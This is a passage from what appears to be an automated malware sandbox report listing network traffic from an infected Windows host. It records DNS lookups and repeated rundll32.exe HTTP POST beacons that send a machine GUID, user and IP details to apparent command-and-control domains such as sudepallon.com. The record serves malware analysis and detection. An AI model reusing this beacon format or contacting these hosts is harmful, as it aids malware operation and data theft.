                              Jul 9, 2021 03:11:15.146444082 CEST4972080192.168.2.38.211.241.0
                              Jul 9, 2021 03:11:15.146450043 CEST80497208.211.241.0192.168.2.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 9, 2021 03:09:54.639463902 CEST6418553192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:54.655057907 CEST53641858.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:55.370748043 CEST6511053192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:55.385265112 CEST53651108.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:56.096404076 CEST5836153192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:56.112046003 CEST53583618.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:56.752063036 CEST6349253192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:56.766921997 CEST53634928.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:57.500541925 CEST6083153192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:57.514754057 CEST53608318.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:58.365957975 CEST6010053192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:58.381784916 CEST53601008.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:59.137655020 CEST5319553192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:59.151870966 CEST53531958.8.8.8192.168.2.3
                              Jul 9, 2021 03:09:59.903156996 CEST5014153192.168.2.38.8.8.8
                              Jul 9, 2021 03:09:59.917824984 CEST53501418.8.8.8192.168.2.3
                              Jul 9, 2021 03:10:00.729224920 CEST5302353192.168.2.38.8.8.8
                              Jul 9, 2021 03:10:00.742374897 CEST53530238.8.8.8192.168.2.3
                              Jul 9, 2021 03:10:01.701993942 CEST4956353192.168.2.38.8.8.8
                              Jul 9, 2021 03:10:01.714581966 CEST53495638.8.8.8192.168.2.3
                              Jul 9, 2021 03:10:02.722788095 CEST5135253192.168.2.38.8.8.8
                              Jul 9, 2021 03:10:02.736437082 CEST53513528.8.8.8192.168.2.3
                              Jul 9, 2021 03:10:41.478379011 CEST5934953192.168.2.38.8.8.8
                              Jul 9, 2021 03:10:41.522432089 CEST53593498.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:12.916574955 CEST5708453192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:12.930475950 CEST53570848.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:13.421593904 CEST5882353192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:13.864721060 CEST53588238.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:14.366192102 CEST5756853192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:14.379498005 CEST53575688.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:16.604434967 CEST5054053192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:16.617294073 CEST53505408.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:18.110523939 CEST5436653192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:18.124867916 CEST53543668.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:18.921077013 CEST5303453192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:20.726341009 CEST5303453192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:21.068377018 CEST5776253192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:21.084336996 CEST53577628.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:21.168353081 CEST53530348.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:23.348548889 CEST53530348.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:51.177201033 CEST5543553192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:51.190474987 CEST53554358.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:51.826268911 CEST5071353192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:51.839157104 CEST53507138.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:51.888937950 CEST5613253192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:51.901571989 CEST53561328.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:52.152251959 CEST5898753192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:52.436597109 CEST5657953192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:52.450026989 CEST53565798.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:52.605532885 CEST53589878.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:52.670871973 CEST6063353192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:52.685379982 CEST53606338.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:52.744498014 CEST6129253192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:52.759001970 CEST53612928.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:52.985371113 CEST6361953192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:52.999325037 CEST53636198.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:53.333055019 CEST6493853192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:53.361083031 CEST53649388.8.8.8192.168.2.3
                              Jul 9, 2021 03:11:56.042469978 CEST6194653192.168.2.38.8.8.8
                              Jul 9, 2021 03:11:56.056235075 CEST53619468.8.8.8192.168.2.3

                              ICMP Packets

                              TimestampSource IPDest IPChecksumCodeType
                              Jul 9, 2021 03:11:23.363476992 CEST192.168.2.38.8.8.8cff0(Port unreachable)Destination Unreachable

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jul 9, 2021 03:11:12.916574955 CEST192.168.2.38.8.8.80xc066Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:13.421593904 CEST192.168.2.38.8.8.80x9da1Standard query (0)sudepallon.comA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:14.366192102 CEST192.168.2.38.8.8.80xb0caStandard query (0)srand04rf.ruA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.110523939 CEST192.168.2.38.8.8.80x7080Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.921077013 CEST192.168.2.38.8.8.80xdb11Standard query (0)pospvisis.comA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:20.726341009 CEST192.168.2.38.8.8.80xdb11Standard query (0)pospvisis.comA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.826268911 CEST192.168.2.38.8.8.80x7edfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.152251959 CEST192.168.2.38.8.8.80x8abaStandard query (0)sudepallon.comA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.436597109 CEST192.168.2.38.8.8.80xbaebStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.744498014 CEST192.168.2.38.8.8.80xb220Standard query (0)sudepallon.comA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:56.042469978 CEST192.168.2.38.8.8.80x16b4Standard query (0)pospvisis.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.216.118A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.211.162A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.136.132A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST8.8.8.8192.168.2.30xc066No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.218.217A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:13.864721060 CEST8.8.8.8192.168.2.30x9da1No error (0)sudepallon.com77.222.42.67A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:14.379498005 CEST8.8.8.8192.168.2.30xb0caNo error (0)srand04rf.ru8.211.241.0A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.216.118A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.211.162A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.136.132A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST8.8.8.8192.168.2.30x7080No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.218.217A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:21.168353081 CEST8.8.8.8192.168.2.30xdb11No error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:23.348548889 CEST8.8.8.8192.168.2.30xdb11Server failure (2)pospvisis.comnonenoneA (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.226.23A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.121.178A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.224.49A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.88.121A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.136.132A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST8.8.8.8192.168.2.30x7edfNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.224.49A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.211.162A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.190.106A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST8.8.8.8192.168.2.30xbaebNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.226.23A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.605532885 CEST8.8.8.8192.168.2.30x8abaNo error (0)sudepallon.com77.222.42.67A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.759001970 CEST8.8.8.8192.168.2.30xb220No error (0)sudepallon.com77.222.42.67A (IP address)IN (0x0001)
                              Jul 9, 2021 03:11:52.999325037 CEST8.8.8.8192.168.2.30xdecfNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                              Jul 9, 2021 03:11:56.056235075 CEST8.8.8.8192.168.2.30x16b4No error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • api.ipify.org
                              • sudepallon.com
                              • srand04rf.ru

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.34971823.21.173.15580C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:13.153486013 CEST361OUTGET / HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: api.ipify.org
                              Cache-Control: no-cache
                              Jul 9, 2021 03:11:13.257200956 CEST361INHTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:13 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.34971977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:13.969963074 CEST362OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:14.041244984 CEST362INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:15 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 33 38 0d 0a 47 48 53 54 41 52 68 41 45 67 34 4f 43 6b 42 56 56 51 6b 49 47 78 51 65 53 6b 34 49 48 46 51 49 44 31 56 4e 45 68 77 51 43 52 34 63 45 42 45 4a 56 42 38 43 48 77 63 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 38GHSTARhAEg4OCkBVVQkIGxQeSk4IHFQID1VNEhwQCR4cEBEJVB8CHwc=0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              10192.168.2.34973077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:25.400021076 CEST680OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:25.470036030 CEST680INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:27 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQJQJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              100192.168.2.34982777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:02.391139030 CEST5501OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              101192.168.2.34982877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              102192.168.2.34982977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              103192.168.2.34983077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              104192.168.2.34983177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              105192.168.2.34983277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              106192.168.2.34983377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              107192.168.2.34983477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              108192.168.2.34983577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              109192.168.2.34983677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              11192.168.2.34973177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:26.261089087 CEST681OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:26.333961964 CEST681INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:27 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              110192.168.2.34983777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              111192.168.2.34983877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              112192.168.2.34983977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              113192.168.2.34984077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              114192.168.2.34984177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              115192.168.2.34984277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              116192.168.2.34984377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              117192.168.2.34984477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              118192.168.2.34984577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              119192.168.2.34984677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              12192.168.2.34973277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:27.219418049 CEST682OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:27.289185047 CEST682INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:28 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNNMMARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              120192.168.2.34984777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              121192.168.2.34984877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              122192.168.2.34984977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              123192.168.2.34985077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              124192.168.2.34985177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              125192.168.2.34985277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              126192.168.2.34985377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData


